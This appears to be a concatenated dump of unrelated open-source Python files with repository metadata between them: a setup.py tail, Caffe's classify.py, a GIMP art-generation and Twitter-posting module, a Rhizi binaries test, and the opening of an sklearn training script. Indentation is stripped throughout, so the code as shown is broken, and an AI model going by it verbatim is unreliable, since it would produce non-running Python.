https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.rst'), encoding='utf-8') as f:
long_description = f.read()
setup(
name='scrapy-statsd',
version='1.0.1',
description='Publish Scrapy stats to statsd',
long_description=long_description,
url='https://github.com/vinayan3/scrapy-statsd',
author='Vinay Anantharaman',
author_email='[email protected]',
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
keywords='scrapy stats stats',
packages=find_packages(exclude=['contrib', 'docs', 'tests']),
install_requires=[
'six',
'Scrapy>=1.0.5',
'statsd==3.2.1'
],
extras_require={
'dev': [],
'test': ['mock==1.3.0'],
},
)
|
mit
|
sichenucsd/caffe_si
|
python/classify.py
|
31
|
3625
|
#!/usr/bin/env python
"""
classify.py is an out-of-the-box image classifer callable from the command line.
By default it configures and runs the Caffe reference ImageNet model.
"""
import numpy as np
import os
import sys
import argparse
import glob
import time
import caffe
def main(argv):
pycaffe_dir = os.path.dirname(__file__)
parser = argparse.ArgumentParser()
# Required arguments: input and output files.
parser.add_argument(
"input_file",
help="Input image, directory, or npy."
)
parser.add_argument(
"output_file",
help="Output npy filename."
)
# Optional arguments.
parser.add_argument(
"--model_def",
default=os.path.join(pycaffe_dir,
"../examples/imagenet/imagenet_deploy.prototxt"),
help="Model definition file."
)
parser.add_argument(
"--pretrained_model",
default=os.path.join(pycaffe_dir,
"../examples/imagenet/caffe_reference_imagenet_model"),
help="Trained model weights file."
)
parser.add_argument(
"--gpu",
action='store_true',
help="Switch for gpu computation."
)
parser.add_argument(
"--center_only",
action='store_true',
help="Switch for prediction from center crop alone instead of " +
"averaging predictions across crops (default)."
)
parser.add_argument(
"--images_dim",
default='256,256',
help="Canonical 'height,width' dimensions of input images."
)
parser.add_argument(
"--mean_file",
default=os.path.join(pycaffe_dir,
'caffe/imagenet/ilsvrc_2012_mean.npy'),
help="Data set image mean of H x W x K dimensions (numpy array). " +
"Set to '' for no mean subtraction."
)
parser.add_argument(
"--input_scale",
type=float,
default=255,
help="Multiply input features by this scale before input to net"
)
parser.add_argument(
"--channel_swap",
default='2,1,0',
help="Order to permute input channels. The default converts " +
"RGB -> BGR since BGR is the Caffe default by way of OpenCV."
)
parser.add_argument(
"--ext",
default='jpg',
help="Image file extension to take as input when a directory " +
"is given as the input file."
)
args = parser.parse_args()
image_dims = [int(s) for s in args.images_dim.split(',')]
channel_swap = [int(s) for s in args.channel_swap.split(',')]
# Make classifier.
classifier = caffe.Classifier(args.model_def, args.pretrained_model,
image_dims=image_dims, gpu=args.gpu, mean_file=args.mean_file,
input_scale=args.input_scale, channel_swap=channel_swap)
if args.gpu:
print 'GPU mode'
# Load numpy array (.npy), directory glob (*.jpg), or image file.
args.input_file = os.path.expanduser(args.input_file)
if args.input_file.endswith('npy'):
inputs = np.load(args.input_file)
elif os.path.isdir(args.input_file):
inputs =[caffe.io.load_image(im_f)
for im_f in glob.glob(args.input_file + '/*.' + args.ext)]
else:
inputs = [caffe.io.load_image(args.input_file)]
print "Classifying %d inputs." % len(inputs)
# Classify.
start = time.time()
predictions = classifier.predict(inputs, not args.center_only)
print "Done in %.2f s." % (time.time() - start)
# Save
np.save(args.output_file, predictions)
if __name__ == '__main__':
main(sys.argv)
|
bsd-2-clause
|
J216/gimp_be
|
gimp_be/core.py
|
1
|
27568
|
import gimp
from gimp import pdb
from settings import *
from network import *
from image import *
from utils import *
from draw import *
from paint import *
from collections import Counter
import TwitterAPI
from random import randrange, choice, shuffle
from string import letters
import datetime as dt
from time import sleep
def setTwitterAPIKeys(ACCESS_TOKEN_KEY="NOT_SET",CONSUMER_KEY="NOT_SET",CONSUMER_SECRET="NOT_SET",ACCESS_TOKEN_SECRET="NOT_SET"):
global settings_data
if not ACCESS_TOKEN_KEY == "NOT_SET":
settings_data['twitter']['ACCESS_TOKEN_KEY']=ACCESS_TOKEN_KEY
settings_data['twitter']['CONSUMER_KEY']=CONSUMER_KEY
settings_data['twitter']['CONSUMER_SECRET']=CONSUMER_SECRET
settings_data['twitter']['ACCESS_TOKEN_SECRET']=ACCESS_TOKEN_SECRET
saveSettings()
def addHashtag(tag):
#add hashtag to settings
global settings_data
settings_data['twitter']['hashtags']=settings_data['twitter']['hashtags']+u' #'+unicode(tag, "utf-8")
saveSettings()
def removeHashtag(tag):
#return string of hashtags filling given character space
global settings_data
hashtags=map(str, settings_data['twitter']['hashtags'].split('#')[1:])
hashtags=map(str.strip, hashtags)
if tag in hashtags:
hashtags.remove(tag)
rt=''
for hashtag in hashtags:
rt=rt+'#'+hashtag + ' '
rt.strip()
settings_data['twitter']['hashtags']=rt
saveSettings()
return True
else:
return False
def hashtagString(length=140,mode=0):
#return string of hashtags filling given character space
global settings_data
hashtags=settings_data['twitter']['hashtags'].split('#')[1:]
hs=''
ll=[]
for item in hashtags:
if len(item)+2<=length:
ll.append(item)
ll.sort(key=len)
while length > len(ll[0]) and len(ll) > 0:
il=[]
for item in ll:
if len(item)+2<=length:
il.append(item)
shuffle(il)
if not len(il)==0:
nh=il.pop()
if len(nh)+2<=length:
length=length-len(nh)-2
hs=hs+'#'+nh.strip()+' '
if nh in ll:
ll.remove(nh)
if len(ll)<1:
return str(hs).strip()
return str(hs).strip()
def setDefaultTweet(default_tweet='GIMP-Python tweet!'):
global settings_data
settings_data['twitter']['default_tweet']=unicode(default_tweet, "utf-8")
saveSettings()
def tweetText(opt=0):
global settings_data
now = dt.datetime.now()
updateLocationData()
title = imageTitle(2)
city = settings_data["location"]["city"]
state = settings_data["location"]["state"]
host_name = settings_data["network"]["host_name"]
tempf = settings_data["location"]["tempf"]
weather = settings_data["location"]["weather"]
hashtags = settings_data["twitter"]["hashtags"]
time_stamp = str(dt.datetime.now())
tweet_text = ''
if opt == 0:
tweet_text = title + '\nby ' + settings_data['user']['author'] + '\n' + city + ' ' + state + ' | ' + host_name + '\n' + tempf + 'F ' + weather + '\n' + now.strftime("%A %B %d - %I:%M%p")
elif opt == 1:
tweet_text = title + '\nby ' + settings_data['user']['author'] + ' ' + time_stamp[:4] + '\n'
else:
tweet_text = title + '\nby ' + settings_data['user']['author'] + ' ' + time_stamp[:4]
tweet_text = tweet_text + '\n'+hashtagString(139-len(tweet_text))
return tweet_text
def tweetImage(message,image_file):
global settings_data
CONSUMER_KEY = settings_data['twitter']['consumer_key']
CONSUMER_SECRET = settings_data['twitter']['consumer_secret']
ACCESS_TOKEN_KEY = settings_data['twitter']['access_token_key']
ACCESS_TOKEN_SECRET = settings_data['twitter']['access_token_secret']
api = TwitterAPI.TwitterAPI(CONSUMER_KEY, CONSUMER_SECRET, ACCESS_TOKEN_KEY, ACCESS_TOKEN_SECRET)
file = open(image_file, 'rb')
data = file.read()
r = api.request('statuses/update_with_media', {'status':message}, {'media[]':data})
return str(str(r.status_code))
def qS():
# quick set up of default size image
imageSetup()
def qXJ(comment=""):
# quick export jpg default with unique file name
global settings_data
settings_data['path']['export_name'] = str(settings_data['path']['default_save_path'])+'art-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.jpg'
if comment=="":
comment=tweetText(0)
saved=saveJPG(settings_data['path']['export_name'],comment)
qXDT(saved[1],comment)
sleep(1)
return saved
def qXP(comment=""):
# quick export png default with unique file name
global settings_data
settings_data['path']['export_name'] = str(settings_data['path']['default_save_path'])+'art-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.png'
image = gimp.image_list()[0]
if comment=="":
comment=tweetText(0)
saved = savePNG(settings_data['path']['export_name'])
qXDT(saved[1],comment)
return saved
def qG(comment="",delay=100):
# quick export png default with unique file name
global settings_data
settings_data['path']['export_name'] = str(settings_data['path']['default_save_path'])+'animation-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.gif'
image = gimp.image_list()[0]
if comment=="":
comment=tweetText(0)
saved = saveGIF(settings_data['path']['export_name'],delay)
qXDT(saved[1],comment)
return saved
def qP(fn=""):
# quick save project
global settings_data
if fn=="":
fn = str(settings_data['path']['project_folder'])+'project-'+dt.datetime.now().strftime('%Y%m%d%H%M%S')+'-'+choice(letters)+choice(letters)+choice(letters)+'.xcf'
saveXCFProject(fn)
def qX(comment=""):
# quick export to prefered file type
global settings_data
export_modes = {"qXJ" : qXJ,
"qXP" : qXP,
"qG" : qG}
try:
mode=str(settings_data['image']['export_mode'])
return export_modes[mode](comment)
except:
mode='qXJ'
return export_modes[mode](comment)
def qT():
# generate tweet then qX() then send tweet return results
global settings_data
tweet = tweetText(0)
exported=qX(comment=tweet)
sleep(5)
return (tweetImage(tweet, exported[1]) == '200', tweet)
def qTG():
# generate tweet then qX() then send tweet return results
global settings_data
tweet = tweetText(0)
exported=qG()
return (tweetImage(tweet, exported[1]) == '200', tweet)
def qXDT(fn,comment=""):
global settings_data
setEXIFTags(fn,{"Copyright":settings_data['user']['author']+" "+dt.datetime.now().strftime('%Y'),
"License":settings_data['image']['license'],
"Comment":comment,
"XPComment":comment,
"Description":comment,
"ImageDescription":comment,
"SEMInfo":comment,
"Artist":settings_data['user']['author'],
"Author":settings_data['user']['author'],
"Software":"GIMP 2.8 Python 2.7 EXIFTool",
"Title":comment[:comment.find('\n')],
"XPTitle":comment[:comment.find('\n')],
"Make":"GIMP",
"Model":"Python",
"Rating":"5"})
def paint():
# Full auto painting
global settings_data
image = gimp.image_list()[0]
height = image.height
width = image.width
x_center = width/2
y_center = height/2
image.height
image.width
randomBlend()
loop_range = range(0, random.choice((3, 4, 5, 6)))
loop_range.reverse()
title = imageTitle(2)
for x in loop_range:
# 1. add layer
layer_add_par = {'opacity': 100, 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
editLayerMask(0)
drawable = pdb.gimp_image_active_drawable(image)
# 1. paint layer
if random.choice((0, 1, 1, 1)):
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000),
'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
if random.choice((0, 1, 1, 1, 1)):
drawRays_par = {'Number': random.choice((5, 10, 50, 100, 300)),
'Length': random.choice((80, 160, 240, 400, height / 4, height / 3, height / 2)),
'X': random.choice((width / 2, width / 3, width / 4)),
'Y': random.choice((height / 4, height / 3, height / 2))}
drawRays(drawRays_par['Number'], drawRays_par['Length'], drawRays_par['X'], drawRays_par['Y'])
# 1. mask edit
editLayerMask(1)
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000), 'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
if random.choice((0, 1, 1, 1, 1)):
drawRays_par = {'Number': random.choice((5, 10, 50, 100, 300)),
'Length': random.choice((80, 160, 240, 400, height / 4, height / 3, height / 2)),
'X': random.choice((width / 2, width / 3, width / 4)),
'Y': random.choice((height / 4, height / 3, height / 2))}
drawRays(drawRays_par['Number'], drawRays_par['Length'], drawRays_par['X'], drawRays_par['Y'])
editLayerMask(0)
# 2. add layer
layer_add_par = {'opacity': random.randrange(70, 100), 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
editLayerMask(0)
# 2. paint layer
if x % 4 == 0:
drawBars_par = {'Number': random.choice((2, 3, 4, 5, 6, 7, 8, 12, 16, 32, 64, 128)),
'Mode': random.choice((0, 0, 3))}
drawBars(drawBars_par['Number'], drawBars_par['Mode'])
randomBlend()
# 2. mask edit
editLayerMask(1)
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000), 'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
randomBlend()
editLayerMask(0)
image = gimp.image_list()[0]
# 3. add layer
layer_add_par = {'opacity': random.randrange(55, 100), 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomCircleFill(**fill_par)
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomRectFill(**fill_par)
editLayerMask(0)
# 3. paint layer
if random.choice((0, 1, 1, 1, 1)):
drawRays_par = {'rays': random.choice((3, 5, 10, 15, 30, 45)), 'rayLength': random.choice(
(width / 4, width / 3, width / 2, 4 * (width / 5), 3 * (width / 4), 2 * (width / 3))),
'centerX': random.choice((width / 4, width / 3, width / 2, 4 * (width / 5), 3 * (width / 4),
2 * (width / 3))), 'centerY': random.choice(
(height / 4, height / 3, height / 2, 4 * (height / 5), 3 * (height / 4), 2 * (height / 3)))}
drawRays(**drawRays_par)
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomCircleFill(**fill_par)
if random.choice((0, 1)):
fill_par = {'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomRectFill(**fill_par)
if random.choice((0, 1)):
randomBrush()
if random.choice((0, 1)):
randomDynamics()
if random.choice((0, 1, 1, 1, 1)):
brushSize(50)
drawTree_par = {'x1': random.randrange(width / 4, 3 * (width / 4)),
'y1': random.randrange(height / 4, 3 * (height / 4)), 'angle': random.randrange(0, 360),
'depth': random.randrange(5, 7)}
drawOddTree(**drawTree_par) # x1, y1, angle, depth
if random.choice((0, 1, 1, 1, 1)):
if random.choice((0, 1, 1, 1, 1)):
brushSize(random.randrange(20, (height / 3)))
if random.choice((0, 1, 1, 1, 1)):
brushColor()
drawRays_par = {'rays': random.choice((10, 50, 100)),
'rayLength': random.choice((80, 160, 240, 400, height / 4, height / 3, height / 2)),
'centerX': random.choice(
((x_center + x_center / 2), x_center, x_center / 2, x_center / 3, x_center / 4)),
'centerY': random.choice(
((x_center + x_center / 2), x_center, x_center / 2, x_center / 3, x_center / 4))}
drawRays(**drawRays_par)
# 3. mask edit
editLayerMask(1)
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000), 'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
# 4. add layer
layer_add_par = {'opacity': random.randrange(55, 100), 'msk': 1}
addNewLayer(**layer_add_par)
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
brushSize(-1)
editLayerMask(0)
# 4. paint layer
if random.choice((0, 1, 1, 1, 1)):
drawSin_par = {
'bar_space': random.choice((16, 18, 19, 20, 21, 51, 52, 53, 54, 56, 55, 57, 58, 59)),
'bar_length': random.choice((10, 100, height / 3)),
'mag': random.choice((40, 69, 120, 200, 300, 400, height / 2)),
'x_offset': 0,
'y_offset': random.randrange(height / 12, height)
}
drawSinWave(**drawSin_par)
if random.choice((0, 1, 1, 1, 1)):
drawForest(random.randrange(15, 64), 0)
if random.choice((0, 1, 1, 1, 1)):
# 5. mask edit
editLayerMask(1)
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
plasma_par = {'Image': image, 'Draw': drawable, 'Seed': random.randrange(1, 1000),
'Turbulence': random.choice(
(0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 1.0, 1.5, 1.1, 1.4, 1.8, 2.0, 2.7))}
pdb.plug_in_plasma(plasma_par['Image'], plasma_par['Draw'], plasma_par['Seed'], plasma_par['Turbulence'])
if random.choice((0, 1)):
fill_par = {
'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomCircleFill(**fill_par)
if random.choice((0, 1)):
fill_par = {
'num': random.choice((1, 1, 1, 1, 1, 1, 1, 1, 2, 3, 3, 3, 3, 4, 5, 8, 9, 12, 24, 64, 128, 512)),
'size': random.randrange(15, height), 'opt': 3, 'sq': random.choice((0, 1))}
randomRectFill(**fill_par)
flatten()
image = gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
canvas_par = {'Image': image, 'Draw': drawable, 'Direction': 1, 'Depth': 1}
pdb.plug_in_apply_canvas(canvas_par['Image'], canvas_par['Draw'], canvas_par['Direction'], canvas_par['Depth'])
def dimensionality(folder='',tweet=0):
# automated creation of dimensionality study piece
global settings_data
if folder == '':
folder = settings_data['path']['art_folder']+"resources/"+random.choice(["photos","fractals","plants","rock"])+"/"
loadDirLayer(folder,9699690)
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def fractalMasking():
# fractal layered wtih tile masks
if random.choice([0,0,0,0,1,1,1]):
image=gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
pdb.gimp_invert(drawable)
for x in range(random.choice([3,6,7,8,9,10])):
addFractal()
tile([random.choice([1,2,3,4,5,6,7,8,12]),random.choice([1,2,3,4,5,6,7,8,12])])
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def randomMasking():
# tile mask from random resources
image=gimp.image_list()[0]
drawable = pdb.gimp_image_active_drawable(image)
if random.choice([0,0,0,0,1,1,1]):
pdb.gimp_invert(drawable)
for x in range(random.choice([13,6,7,8,9,10])):
qRes(opacity=random.choice([13,25,33,50,66,75,85]))
layer_mode_par = {'layer': pdb.gimp_image_get_active_layer(image), 'mode': random.randrange(0, 25)}
pdb.gimp_layer_set_mode(layer_mode_par['layer'], layer_mode_par['mode'])
if 25 > random.randrange(0,100):
tile([random.randrange(1,12),random.randrange(1,12)])
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def hybridMasking(option="SpBGsp", noise=0.3):
# masking resources with lots of options
drawInkBlot()
if 'SpBG' in option:
addSpacePhoto(opacity=50)
if "Re" in option:
applyEffect()
for x in range(4,(10+random.randrange(int(noise*5*-1),int(noise*10)))):
if 'ph'in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if 'sc' in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if 'sp' in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if 'fr' in option:
qRes()
if "Re" in option:
applyEffect()
tile([random.randrange(1,12),random.randrange(1,12)])
if "Re" in option:
editLayerMask(1)
applyEffect()
editLayerMask(0)
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def spikeDif():
# draw spike ball or random rays
spikeBallStack(depth=random.choice([3,3,4,5,6,8,10,12,16,20]))
applyEffect()
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def inkBlot():
# draq basic ink blot
inkBlotStack()
applyEffect()
if random.choice([0,0,0,0,1,1,1]):
flatten()
mirror()
def skeleton(type="",num=10,delay=10,tweet=1,study_name="Multifunctional Study"):
# function to take care of exporting and tweet all images produces
automations = {"spikeDif" : spikeDif,
"inkBlot" : inkBlot,
"hybridMasking" : hybridMasking,
"paint" : paint,
"fractalMasking" : fractalMasking,
"randomMasking" : randomMasking}
for i in range(0,num):
qS()
# ################## #
# This is the nugget #
# ################## #
if type == "":
automation_pick = random.choice(automations.keys())
print(automation_pick)
automations[automation_pick]()
else:
automations[type]()
if tweet:
signImage()
flatten()
tweet=imageTitle(2)+'\n by Jared Haer\n'+study_name+'\n'
tweetImage(tweet+hashtagString(len(tweet)),qX()[1])
print(tweet)
closeAll()
sleep(delay)
else:
qX()
closeAll()
def doWeatherPainting():
# draw day
# -draw sun
# -draw clouds
# draw night
# -draw sun
# -draw clouds
print('weather painting?')
def addResource(options=0, resource_type="rock", opacity=90, resource_folder="", scale=[], position=[]):
avoid_folders=['brushes','fonts','gradients','mask','overlays','paths','scraps','signature','stamps','stickers','stock-image','templates','tiles']
if resource_type == "random":
cl=dict(Counter(os.listdir(settings_data['path']['art_folder']+'/resources/'))-Counter(avoid_folders)).keys()
resource_type = random.choice(cl)
if resource_folder == "":
resource_folder = settings_data['path']['art_folder']+'/resources/'+resource_type+'/'
resource_file = ""
resource_files = []
if options == 0:
if resource_type == "":
for file in os.listdir(resource_folder):
if os.path.isdir(resource_folder+file):
for sub_file in os.listdir(resource_folder+file+'/'):
if 'png' in sub_file:
resource_files.append(file+'/'+sub_file)
if 'jpg' in sub_file:
resource_files.append(file+'/'+sub_file)
else:
if 'png' in file:
resource_files.append(file)
if 'jpg' in file:
resource_files.append(file)
else:
for file in os.listdir(resource_folder):
if 'png' in file:
resource_files.append(file)
if 'jpg' in file:
resource_files.append(file)
resource_file = resource_folder+random.choice(resource_files)
loadLayer(resource_file)
image = gimp.image_list()[0]
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_opacity(active_layer, opacity)
if scale==[]:
pdb.gimp_layer_scale(active_layer, image.width, image.height, 0)
else:
pdb.gimp_layer_scale(active_layer, scale[0], scale[1], 0)
if position == []:
pdb.gimp_layer_set_offsets(active_layer, 0, 0)
else:
pdb.gimp_layer_set_offsets(active_layer, position[0], position[1])
def qRes(options=0, sticker_type="random", opacity=90, sticker_folder="", scale=[], position=[]):
if sticker_folder == "" and not sticker_type == 'random':
sticker_folder = settings_data['path']['art_folder']+'/resources/'+resource_type+'/'
addResource(options, sticker_type, opacity, sticker_folder, scale, position)
def addSticker(options=0, sticker_type="", opacity=90, sticker_folder="", scale=[], position=[]):
if sticker_folder == "":
sticker_folder = settings_data['path']['art_folder']+'/resources/stickers/'
addResource(options, sticker_type, opacity, sticker_folder, scale, position)
def addFractal(options=0, fractal_type="", opacity=90, fractal_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if fractal_folder == "":
fractal_folder = settings_data['path']['art_folder']+'/resources/fractals/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, fractal_type, opacity, fractal_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
def addPhoto(options=0, photo_type="", opacity=90, photo_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if photo_folder == "":
photo_folder = settings_data['path']['art_folder']+'/resources/photos/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, photo_type, opacity, photo_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
def addSpacePhoto(options=0, type="", opacity=90, space_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if space_folder == "":
space_folder = settings_data['path']['art_folder']+'/resources/space/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, type, opacity, space_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
def addScriptDrawing(options=0, type="", opacity=90, script_folder="", scale=[], position=[]):
image = gimp.image_list()[0]
if script_folder == "":
script_folder = settings_data['path']['art_folder']+'/resources/script_drawings/'
if position == []:
position = [0,0]
if scale == []:
scale=[image.width, image.height]
addResource(options, type, opacity, script_folder, scale, position)
active_layer = pdb.gimp_image_get_active_layer(image)
pdb.gimp_layer_set_mode(active_layer, random.choice([17,6,15,0,0,0,0,0,0]))
|
mit
|
Rhizi/rhizi
|
rhizi/tests/test_binaries.py
|
1
|
4163
|
# coding: utf-8
import unittest
import os
import sys
import subprocess
from glob import glob
import time
from tempfile import TemporaryFile, mktemp
from six import u
root_path = os.path.realpath(os.path.join(os.path.dirname(__file__), '..', '..'))
bin_path = os.path.join(root_path, 'bin')
def which(f):
return [p for p in [os.path.join(x, f) for x in os.environ['PATH'].split(':')] if os.path.exists(p)][0]
python_bin = which('python')
def run_python_script(s, args):
# not working right now, so do run the long way
return run_process(python_bin, [s] + args)
with open(s) as fd:
old_argv = sys.argv
sys.argv = [s] + args
try:
exec(fd.read())
except Exception as e:
ret = -1, str(e)
else:
ret = 0, None
sys.argv = old_argv
return ret
def run(f, args):
run_python = False
with open(f) as fd:
first_line = fd.readline()
run_python = first_line[:2] == '#!' and 'python' in first_line
if run_python:
return run_python_script(f, args)
else:
return run_process(f, args)
def run_process(f, args):
null = TemporaryFile()
print(str([f] + args))
env = dict(PYTHONPATH=root_path,
LC_ALL='en_US.UTF-8',
LANG='en_US.UTF-8')
proc = subprocess.Popen([f] + args, env=env, stdout=null, stderr=null)
max = 5
dt = 0.1
t = 0
while t < max:
if proc.poll() is not None:
break
t += dt
time.sleep(dt)
if proc.poll() is None:
ret = None # still running is fine - rz_server will run
proc.terminate()
else:
ret = proc.poll()
if ret is None:
return ret, None
null.seek(0)
return ret, null.read().decode('utf-8')
def temp_file(contents):
filename = mktemp()
with open(filename, 'w+') as fd:
fd.write(contents)
return filename
class TestBinaries(unittest.TestCase):
def _helper_test_a_tool(self, bin_name, args):
filename = os.path.join(bin_path, bin_name)
ret, msg = run(filename, args)
self.assertTrue(ret == 0,
msg=u("failed to run {} {}, ret = {}, msg:\n{}").format(
bin_name, args, ret, msg))
def _run_user_tool(self, args):
if not isinstance(args, list):
args = args.split()
self._helper_test_a_tool('rz-user-tool', args)
def test_root_path(self):
"""
helper test for test_binaries
"""
self.assertTrue(os.path.exists(os.path.join(root_path, 'setup.py')))
def test_sanitybinaries(self):
"""
check that bin/* can execute with --help
some scripts may produce log files and db access as side effects.
"""
for bin_name in [os.path.basename(p) for p in glob(os.path.join(bin_path, '*'))]:
self._helper_test_a_tool(os.path.basename(bin_name), ['--help'])
def test_user_tool(self):
"""
test rz-user-tool
do a whole cycle:
init a new file
add a user to it
list the users
"""
userdb_filename = mktemp()
password_filename = temp_file('12345678')
myugid = subprocess.check_output('whoami').strip().decode('utf-8') # assume group = user exists
self._run_user_tool('init --user-db-path {} --user-db-ugid {}'.format(userdb_filename, myugid))
self._run_user_tool(('add --user-db-path {} --password-file {} ' \
'--first-name hiro --last-name protagonist ' \
'--username hiro --email [email protected]').format(
userdb_filename, password_filename))
self._run_user_tool(['add', '--user-db-path', userdb_filename, '--verbose',
'--first-name', 'מורה', '--last-name', 'נבוכים',
'--username', 'מורה', '--email', '[email protected]',
'--password-file', password_filename])
self._run_user_tool('list --user-db-path {} --verbose'.format(userdb_filename))
|
agpl-3.0
|
exowanderer/SpitzerDeepLearningNetwork
|
Python Scripts/sklearn_RandomForests_training.py
|
1
|
29664
|
from argparse import ArgumentParser
ap = ArgumentParser()
ap.add_argument('-ns' , '--n_resamp' , required=False, type=int , default=1 , help="Number of resamples to perform (GBR=1; No Resamp=0)")
ap.add_argument('-nt' , '--n_trees' , required=False, type=int , default=100 , help="Number of trees in the forest")
ap.add_argument('-c' , '--core' , required=False, type=int , default=0 , help="Which Core to Use GBR only Uses 1 Core at a time.")
ap.add_argument('-std', '--do_std' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression")
ap.add_argument('-pca', '--do_pca' , required=False, type=bool, default=False, help="Use Standard Random Forest Regression with PCA preprocessing")# nargs='?', const=True,
